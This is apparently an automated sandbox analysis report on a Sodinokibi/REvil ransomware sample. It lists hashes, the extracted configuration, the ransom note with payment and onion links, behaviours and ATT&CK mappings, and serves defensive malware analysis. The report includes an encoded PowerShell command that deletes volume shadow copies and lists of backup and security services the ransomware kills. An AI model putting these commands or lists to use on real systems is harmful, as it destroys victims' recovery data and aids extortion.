Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05-08-2023 08:38

General

  • Target

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

  • Size

    221KB

  • MD5

    77ed1092409c927f5cd1992021f99147

  • SHA1

    4c9027e660614db7fe653e67a7ac0b726b52cc44

  • SHA256

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463

  • SHA512

    1e01f85f50179fb7620680809862c28c8955e696b397acd6766a2d8a18b81cc08f99c2a059213797ea8de1e004412b9d4853cf1c2ae9f451505322b00e26238a

  • SSDEEP

    6144:Za/6o9aptGtbbqcqjuEyileXEHpSYxyEpq:S5atGtfqcqju3iXHpSgq

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

Campaign

4402

Decoy

gopackapp.com

croftprecision.co.uk

sanyue119.com

chatizel-paysage.fr

falcou.fr

theshungiteexperience.com.au

xn--vrftet-pua.biz

slimani.net

vibethink.net

mrxermon.de

hebkft.hu

danskretursystem.dk

castillobalduz.es

pmc-services.de

advizewealth.com

pixelarttees.com

testcoreprohealthuk.com

ino-professional.ru

alvinschwartz.wordpress.com

mercantedifiori.com

Attributes
  • net

    true

  • pid

    $2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

  • prc

    isqlplussvc

    mydesktopqos

    onenote

    ocomm

    dbsnmp

    powerpnt

    winword

    thebat

    sql

    infopath

    visio

    firefox

    tbirdconfig

    wordpad

    agntsvc

    msaccess

    sqbcoreservice

    xfssvccon

    dbeng50

    thunderbird

    outlook

    mspub

    excel

    mydesktopservice

    steam

    ocautoupds

    oracle

    encsvc

    synctime

    ocssd

  • ransom_oneliner

    Soon you may lose your files FOREVER Find: "readme-{EXT}-NOW.txt" in folders or on your desktop! YOU HAVE A FEW DAYS OR A FILE WILL BE LOST FOREVER !!!

  • ransom_template

    Your files are locked due to a vulnerability in your system by "{EXT}" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/{UID} If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} After going to the site, enter the following code: {KEY}

  • sub

    4402

  • svc

    vss

    backup

    svc$

    memtas

    sql

    veeam

    mepocs

    sophos

Extracted

Path

C:\Recovery\readme-ovxmopp-NOW.txt

Ransom Note
Your files are locked due to a vulnerability in your system by "ovxmopp" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/4B13C627D46B7444 If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! 
After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4B13C627D46B7444 After going to the site, enter the following code: 28KcMc/kmhvEq6BqQZltUPfqz0x1+utMG1QEPyneIigghEQIlsuwejKhmYE/w955 PrMvoZV8WI/Ei2z271VUdfaZ6TLB8oxQEY4LL2WgZ3TRhTJSi7DQjIsnKMC64Ptt XReK2NUL9TSiUC2Pc9qVHAdcFA4tHf1kS8lUZqJtKwJwpBwq7pM/RsQ/uRHoWclJ p/I9Fe42w+3cVLjgCMxwQjdK35k45wIm1Dnye0ZAlOz3DqtlfAZRiXE1anRlH0HM BG71ydNabyOf+BxPuc092x1QDwjP3HPKd2jXEZQZ9Dm/i1C1tmQvuQ7rzL4nxmdz xQyJAI1txLgpF/dVTthRBwQoc73bdauriFhhQgA2AUfcOh6iH1pzG0IvDPiOH1hU jiT5dU0yyUwhmelwAVTt7Yy1kbc9PWQOugSCwnGWqYwBr48PoxYjA1AxVXp0u/eo 4voMXhO6VeGGfTUe6R8/+SMPG9qw6MOYQRlRYDeT4z94auqZrIPv077sk2yUjYuq ous/rHFdj37eAzd36+jKlnt/Mon7bNGL2bUGDov/i2E4NIbPYDm0nGB28K4o9W+R 7+0ozf4vKrSdDuavkZ9ZeRgCtINnrbCJwRWJPJZdkVEoWsBpIe68DmeL4vP3rAic m/TNA5eIfyH3MqZ/blkSpBEPM70yHaprfCEq5EYP3OgjMKaEf22AJmnPm7/3xUX4 Syz2DKFtoxshhXPRWLbWrBqYMMPoVcLswOfDSKJNlR+EcWfbGYCjBei+US13X4om NFnukHR0ZqtHtZy8jQfUz5WYuOEW89Y9FMZp4m5R/JbeXesYxTDBAJTgmvoDRM3w /z843g1XwP+GEO4Vv2pvO/Zyrkgwgu6nvg5onjgo1y2kssMYViCfRqIw3qqJcIzt eM/xxwj9qOCsGDmCfCr5HBB+EXjogVGJpuP9dS3nr2/8pp8mXm6QR3O0ZZxsAJXf LurVSCbJ7rOzmUmFpOxOonI/NzPSCgk4DTF40KweYwIOybg74g9KlwvTqmt4/CxU LiglQli73602sNDPQ+f7uxU6byERsqxfRMCCeNzdxP7DGDMXaJzqxymIWldqYmJg Pjp39v0sOEbeoXWUfSLsZ4EJRI22ZoxYySsEBK1HJ4l2NFsfy7X+p3NIG4NlqhbF gT3IshbfYncx5hiznhEG0v6/oMigDTRy6HHKZE1iMUAGHTBJNV7EwkpQIC1mQMvp qWF9LaG+TQ/S5Lu+sB3Db0GjIYQihoFpJRydKNkMwgeNoqAYuVbw/aV1dywArB6D mH3W7iRyd7UPBVFfr0anDREWSc9RcLThH5cHWvO2K/IBCFoeoQ0/lEqOMxTDLNUF ojcY/ogwMkf7OQPOICT+rVI1+mRmBaB+UndDCMBEfQNKDxAdLlUxIg==
URLs

http://decryptor.cc/4B13C627D46B7444

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4B13C627D46B7444

Signatures

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
    "C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3892
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3532
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3640

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence
      • Boot or Logon Autostart Execution (1) T1547
      • Registry Run Keys / Startup Folder (1) T1547.001

    Privilege Escalation
      • Boot or Logon Autostart Execution (1) T1547
      • Registry Run Keys / Startup Folder (1) T1547.001

    Defense Evasion
      • Modify Registry (3) T1112
      • Subvert Trust Controls (1) T1553
      • Install Root Certificate (1) T1553.004

    Discovery
      • Query Registry (1) T1012
      • Peripheral Device Discovery (1) T1120
      • System Information Discovery (1) T1082

    Impact
      • Defacement (1) T1491


    Downloads

    • C:\Recovery\readme-ovxmopp-NOW.txt
      Filesize

      5KB

      MD5

      448717cc613f7c4c1b88e9913c7fce49

      SHA1

      21c0b07140bb7106626000bf771170a9c3d85c0b

      SHA256

      76e0168ddc8710eac49928713b22afd23113aa2cb72e328b5112b212f543a377

      SHA512

      2cc41496bc8280d04de9d26920f2da580198bc9a94d83a5f162b6945d839414897bcf03953b68e03bbfc97eb5353e8cafe26989b934170287a039d6548237bb3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdbp4etl.nlb.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2968-577-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-134-0x0000000000A70000-0x0000000000B70000-memory.dmp
      Filesize

      1024KB

    • memory/2968-587-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-584-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-580-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-579-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-136-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-153-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-160-0x0000000000A70000-0x0000000000B70000-memory.dmp
      Filesize

      1024KB

    • memory/2968-135-0x00000000001C0000-0x00000000001EB000-memory.dmp
      Filesize

      172KB

    • memory/2968-570-0x00000000001C0000-0x00000000001EB000-memory.dmp
      Filesize

      172KB

    • memory/2968-571-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2968-575-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/3892-152-0x00007FF958690000-0x00007FF959151000-memory.dmp
      Filesize

      10MB

    • memory/3892-149-0x000001C5EAF60000-0x000001C5EAF70000-memory.dmp
      Filesize

      64KB

    • memory/3892-148-0x000001C5EAF60000-0x000001C5EAF70000-memory.dmp
      Filesize

      64KB

    • memory/3892-147-0x00007FF958690000-0x00007FF959151000-memory.dmp
      Filesize

      10MB

    • memory/3892-146-0x000001C5EB310000-0x000001C5EB332000-memory.dmp
      Filesize

      136KB